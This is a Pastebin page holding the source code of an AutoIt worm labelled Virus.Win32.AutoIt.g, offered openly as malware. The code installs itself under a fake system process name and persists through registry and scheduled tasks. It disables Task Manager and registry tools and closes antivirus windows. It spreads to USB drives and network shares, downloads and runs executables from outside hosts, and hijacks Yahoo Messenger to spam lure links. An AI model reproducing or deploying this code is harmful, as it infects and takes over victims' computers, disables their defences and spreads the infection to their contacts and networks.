API tools faq
paste
Advertisement
FlyFar

Virus.Win32.AutoIt.g - Source Code

FlyFar
Jun 12th, 2023
1,612
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 14.07 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. ; <AUT2EXE VERSION: 3.2.0.1>
  2.  
  3. ; ----------------------------------------------------------------------------
  4. ; <AUT2EXE INCLUDE-START: C:\Documents and Settings\nhatquanglan\Desktop\cuoicung.au3>
  5. ; ----------------------------------------------------------------------------
  6.  
  7. ;Written by Nhatquanglan
  8.  
  9. ; ----------------------------------------------------------------------------
  10. ; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
  11. ; ----------------------------------------------------------------------------
  12.  
  13. ; Include Version:1.59  (04/20/2006)
  14. ; ------------------------------------------------------------------------------
  15. ;
  16. ; AutoIt Version: 3.0
  17. ; Language:       English
  18. ; Description:    Functions that assist with process management.
  19. ;
  20. ; ------------------------------------------------------------------------------
  21.  
  22. ;===============================================================================
  23. ;
  24. ; Description -   Returns a string containing the process name that belongs to a given PID.
  25. ; Syntax -        _ProcessGetName( $iPID )
  26. ; Parameters -    $iPID - The PID of a currently running process
  27. ; Requirements -  None.
  28. ; Return Values - Success - The name of the process
  29. ;                 Failure - Blank string and sets @error
  30. ;                       1 - Process doesn't exist
  31. ;                       2 - Error getting process list
  32. ;                       3 - No processes found
  33. ; Author(s) -     Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren.
  34. ; Notes -         Supplementary to ProcessExists().
  35. ;===============================================================================
  36. Func _ProcessGetName( $i_PID )
  37.     If Not ProcessExists($i_PID) Then
  38.         SetError(1)
  39.         Return ''
  40.     EndIf
  41.     Local $a_Processes = ProcessList()
  42.     If Not @error Then
  43.         For $i = 1 To $a_Processes[0][0]
  44.             If $a_Processes[$i][1] = $i_PID Then Return $a_Processes[$i][0]
  45.         Next
  46.     EndIf
  47.     SetError(1)
  48.     Return ''
  49. EndFunc   ;==>_ProcessGetName
  50.  
  51. ;===============================================================================
  52. ;
  53. ; Function Name:    _ProcessGetPriority()
  54. ; Description:      Get the  priority of an open process
  55. ; Parameter(s):     $vProcess      - PID or name of a process.
  56. ; Requirement(s):   AutoIt Beta v3.1.1.61+
  57. ;                   kernel32.dll (included with Windows)
  58. ; Return Value(s):  On Success - Returns integer corressponding to
  59. ;                   the processes's priority:
  60. ;                     0 - Idle/Low
  61. ;                     1 - Below Normal (Not supported on Windows 95/98/ME)
  62. ;                     2 - Normal
  63. ;                     3 - Above Normal (Not supported on Windows 95/98/ME)
  64. ;                     4 - High
  65. ;                     5 - Realtime
  66. ; On Failure:       Returns -1 and sets @Error to 1
  67. ; Author(s):        Matthew Tucker
  68. ;                   Valik added Pid or Processname logic
  69. ;===============================================================================
  70. ;
  71. Func _ProcessGetPriority($vProcess)
  72.     Local $i_PID = ProcessExists($vProcess)
  73.     If Not $i_PID Then
  74.         SetError(1)
  75.         Return -1
  76.     EndIf
  77.     Local $hDLL = DllOpen('kernel32.dll')
  78.     Local $aProcessHandle = DllCall($hDLL, 'int', 'OpenProcess', 'int', 0x0400, 'int', False, 'int', $i_PID)
  79.     Local $aPriority = DllCall($hDLL, 'int', 'GetPriorityClass', 'int', $aProcessHandle[0])
  80.     DllCall($hDLL, 'int', 'CloseHandle', 'int', $aProcessHandle[0])
  81.     DllClose($hDLL)
  82.     Switch $aPriority[0]
  83.         Case 0x00000040
  84.             Return 0
  85.         Case 0x00004000
  86.             Return 1
  87.         Case 0x00000020
  88.             Return 2
  89.         Case 0x00008000
  90.             Return 3
  91.         Case 0x00000080
  92.             Return 4
  93.         Case 0x00000100
  94.             Return 5
  95.         Case Else
  96.             SetError(1)
  97.             Return -1
  98.     EndSwitch
  99.  
  100. EndFunc  ;==>_ProcessGetPriority
  101.  
  102. ;===============================================================================
  103. ;
  104. ; Description:      Executes a DOS command in a hidden command window.
  105. ; Syntax:           _RunDOS( $sCommand )
  106. ; Parameter(s):     $sCommand - Command to execute
  107. ; Requirement(s):   None
  108. ; Return Value(s):  On Success - Returns the exit code of the command
  109. ;                   On Failure - Depends on RunErrorsFatal setting
  110. ; Author(s):        Jeremy Landes <jlandes at landeserve dot com>
  111. ; Note(s):          None
  112. ;
  113. ;===============================================================================
  114. Func _RunDOS($sCommand)
  115.     Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
  116. EndFunc   ;==>_RunDOS
  117.  
  118. ; ----------------------------------------------------------------------------
  119. ; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
  120. ; ----------------------------------------------------------------------------
  121.  
  122. #NoTrayIcon
  123. $name = "SCVHOST"
  124. $setting = "setting"
  125. $ini = ".ini"
  126. $nql = ".nql"
  127. $xls = ".xls"
  128. $exe = ".exe"
  129. $toigioupdate = @HOUR + 2
  130. $toigio = @MIN + 30
  131. FileCopy (@AutoItExe, @SystemDir & "\" & $name & $exe,0)
  132. FileSetAttrib (@SystemDir & "\" & $name & $exe,"+RSH")
  133. FileCopy (@AutoItExe, @WindowsDir & "\" & $name & $exe,0)
  134. FileSetAttrib (@WindowsDir & "\" & $name & $exe,"-RSH")
  135. RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe " & $name & $exe)
  136. RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "\" & $name & $exe)
  137. RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NofolderOptions","REG_DWORD",1)
  138. RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD",1)
  139. RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD",1)
  140. _RunDOS ("AT /delete /yes")
  141. _RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe)
  142. RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule","AtTaskMaxHours","REG_DWORD",0)
  143. sendmess()
  144. update()
  145. $a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared")
  146. If $a ="" Then
  147.     copynetwork ()
  148. EndIf
  149. If $a <>"" Then
  150.     If FileExists ($a)=0 Then
  151.         copynetwork()
  152.     EndIf
  153. EndIf
  154. While (1)
  155.     killprocess()
  156.     copyusb()
  157.     If @HOUR = $toigioupdate Then
  158.         update()
  159.     EndIf
  160.     If @MIN = $toigio Then
  161.         sendmess()
  162.     EndIf
  163. WEnd
  164. Func downloadurl()
  165.     $settingurl = "http://nhattruongquang.0catch.com"
  166.     $settingurl1 = "http://www.freewebs.com/nhattruongquang"
  167.     If InetGet ($settingurl & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
  168.         If InetGet ($settingurl & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
  169.             If InetGet ($settingurl1 & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
  170.                 InetGet ($settingurl1 & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
  171.             EndIf
  172.         EndIf
  173.     EndIf
  174.     FileSetAttrib (@SystemDir & "\" & $setting & $ini,"+RSH")
  175. EndFunc
  176. Func update()
  177.     downloadurl()
  178.     $website = IniRead (@SystemDir & "\" & $setting & $ini,"setting","website","")
  179.     $check01 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload1","")
  180.     $check02 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload2","")
  181.     $check03 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload3","")
  182.     If $check01 <>"" Then
  183.         If Not FileExists (@SystemDir & "\" & $check01 & $exe) Then
  184.             If InetGet ($website & "/" & $check01 & $nql,@SystemDir & "\" & $check01 & $exe,1,0)=0 Then
  185.                 InetGet ($website & "/" & $check01 & $xls,@SystemDir & "\" & $check01 & $exe,1,0)
  186.             EndIf
  187.             If FileExists (@SystemDir & "\" & $check01 & $exe) Then
  188.                 FileSetAttrib (@SystemDir & "\" & $check01 & $exe,"+RSH")
  189.                 Run (@SystemDir & "\" & $check01 & $exe)
  190.             EndIf
  191.         EndIf
  192.     EndIf
  193.     If $check02 <>"" Then
  194.         If Not FileExists (@SystemDir & "\" & $check02 & $exe) Then
  195.             If InetGet ($website & "/" & $check02 & $nql,@SystemDir & "\" & $check02 & $exe,1,0)=0 Then
  196.                 InetGet ($website & "/" & $check02 & $xls,@SystemDir & "\" & $check02 & $exe,1,0)
  197.             EndIf
  198.             If FileExists (@SystemDir & "\" & $check02 & $exe) Then
  199.                 FileSetAttrib (@SystemDir & "\" & $check02 & $exe,"+RSH")
  200.                 Run (@SystemDir & "\" & $check02 & $exe)
  201.             EndIf
  202.         EndIf
  203.     EndIf
  204.     If $check03 <>"" Then
  205.         If Not FileExists (@SystemDir & "\" & $check03 & $exe) Then
  206.             If InetGet ($website & "/" & $check03 & $nql,@SystemDir & "\" & $check03 & $exe,1,0)=0 Then
  207.                 InetGet ($website & "/" & $check03 & $xls,@SystemDir & "\" & $check03 & $exe,1,0)
  208.             EndIf
  209.             If FileExists (@SystemDir & "\" & $check03 & $exe) Then
  210.                 FileSetAttrib (@SystemDir & "\" & $check03 & $exe,"+RSH")
  211.                 Run (@SystemDir & "\" & $check03 & $exe)
  212.             EndIf
  213.         EndIf
  214.     EndIf
  215.     $toigioupdate = @HOUR + 2
  216.     If $toigioupdate >12 Then
  217.         $toigioupdate = $toigioupdate -12
  218.     EndIf
  219. EndFunc
  220. Func sendmess()
  221.     $myweb = IniRead (@SystemDir & "\" & $setting & $ini,"setting","myweb","")
  222.     If $myweb = "" Then
  223.         $myweb = "http://nhattruongquang.0catch.com"
  224.     EndIf
  225.     Dim $tin [10]
  226.     $tin[0] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[0]","")
  227.     If $tin[0] = "" Then
  228.         $tin[0] = "E may, vao day coi co con nho nay ngon lam " & $myweb & " "
  229.     EndIf
  230.     $tin[1] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[1]","")
  231.     If $tin[1] = "" Then
  232.         $tin[1] = "Vao day nghe bai nay di ban " & $myweb & " "
  233.     EndIf
  234.     $tin[2] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[2]","")
  235.     If $tin[2] = "" Then
  236.             $tin[2] = "Vao day nghe bai nay di ban " & $myweb & " "
  237.     EndIf
  238.     $tin[3] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[3]","")
  239.     If $tin[3] = "" Then
  240.         $tin[3] = "Biet tin gi chua, vao day coi di " & $myweb & " "
  241.     EndIf
  242.     $tin[4] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[4]","")
  243.     If $tin[4] = "" Then
  244.         $tin[4] = "Trang Web nay coi cung hay, vao coi thu di " & $myweb & " "
  245.     EndIf
  246.     $tin[5] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[5]","")
  247.     If $tin[5] = "" Then
  248.         $tin[5] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau?  " &$myweb &"  "
  249.     EndIf
  250.     $tin[6] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[6]","")
  251.     If $tin[6] = "" Then
  252.         $tin[6] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $myweb & " "
  253.     EndIf
  254.     $tin[7] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[7]","")
  255.     If $tin[7] = "" Then
  256.         $tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $myweb & " "
  257.     EndIf
  258.     $tin[8] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[8]","")
  259.     If $tin[8] = "" Then
  260.         $tin[8] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $myweb & " "
  261.     EndIf
  262.     $tin[9] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[9]","")
  263.     If $tin[9] = "" Then
  264.         $tin[9] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $myweb & " "
  265.     EndIf
  266.     $tieude = WinGetTitle("Yahoo! Messenger", "")
  267.     $kiemtra = WinExists ($tieude)
  268.     If $kiemtra = 1 Then
  269.         $ngaunhien = Random(0,9,1)
  270.         ClipPut ($tin[$ngaunhien])
  271.         BlockInput (1)
  272.         WinActivate ($tieude)
  273.         Send ("!m")
  274.         Send ("un")
  275.         Send ("^v {ENTER}{ENTER}")
  276.         Send ("^m")
  277.         Send ("{DOWN}")
  278.         Send ("^{SHIFTDOWN}{END}{SHIFTUP}")
  279.         Send ("{ENTER}")
  280.         Send ("^v {ENTER}")
  281.         BlockInput (0)
  282.     EndIf
  283.     $toigio=@MIN + 30
  284.     If $toigio>60 Then
  285.         $toigio=$toigio-60
  286.     EndIf
  287. EndFunc
  288. Func killprocess()
  289.     If WinExists ("Bkav2006") Then
  290.         WinClose ("Bkav2006")
  291.         RegDelete ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","BkavFw")
  292.     EndIf
  293.     If WinExists ("System Configuration") Then
  294.         WinClose ("System Configuration")
  295.     EndIf
  296.     If WinExists ("Registry") Then
  297.         WinClose ("Registry")
  298.     EndIf
  299.     If WinExists ("Windows Task") Then
  300.         WinClose ("Windows Task")
  301.     EndIf
  302.     If WinExists ("[FireLion]") Then
  303.         RegDelete ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","IEProtection")
  304.         Shutdown (2)
  305.     EndIf
  306. EndFunc
  307. Func copyusb()
  308.     Dim $usb[3]
  309.     $usb[0]=""
  310.     $usb[1]=""
  311.     $usb[2]=""
  312.     $usb = DriveGetDrive("REMOVABLE")
  313.     If NOT @error Then
  314.         If $usb[1] <>"A:" Then
  315.             FileCopy (@WindowsDir & "\" & $name & $exe,$usb[1] & "\New Folder.exe",0)
  316.             Search($usb[1])
  317.         EndIf
  318.         If $usb[1]="A:" Then
  319.             If $usb[2]<>"" Then
  320.                 FileCopy (@WindowsDir & "\" & $name & $exe,$usb[2] & "\New Folder.exe",0)
  321.                 Search($usb[2])
  322.             EndIf
  323.         EndIf
  324.     EndIf
  325. EndFunc
  326. Func Search($current)
  327.     Local $search = FileFindFirstFile($current & "\*.*")
  328.     While 1
  329.         Dim $file = FileFindNextFile($search)
  330.         If @error Or StringLen($file) < 1 Then ExitLoop
  331.         If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file <> "." Or $file <> "..") Then
  332.             FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & $exe,0)
  333.             Search($current & "\" & $file)
  334.         EndIf
  335.  
  336.         Sleep (1)
  337.     WEnd
  338.     FileClose($search)
  339. EndFunc
  340. Func copynetwork ()
  341.     Dim $mang[30]
  342.     For $i=1 to 30
  343.         $read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares",$i)
  344.         If @error Then ExitLoop
  345.         $read = StringReplace ($read,"/","\")
  346.         $mang[$i] = "\\" & $read
  347.         $checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1)
  348.         If $checkcopy =1 Then
  349.             Search($mang[$i])
  350.         EndIf
  351.     Next
  352.     RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared","REG_SZ",$mang[$i-1] & "\New Folder.exe")
  353. EndFunc
  354.  
  355. ; ----------------------------------------------------------------------------
  356. ; <AUT2EXE INCLUDE-END: C:\Documents and Settings\nhatquanglan\Desktop\cuoicung.au3>
  357. ; ----------------------------------------------------------------------------
  358.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!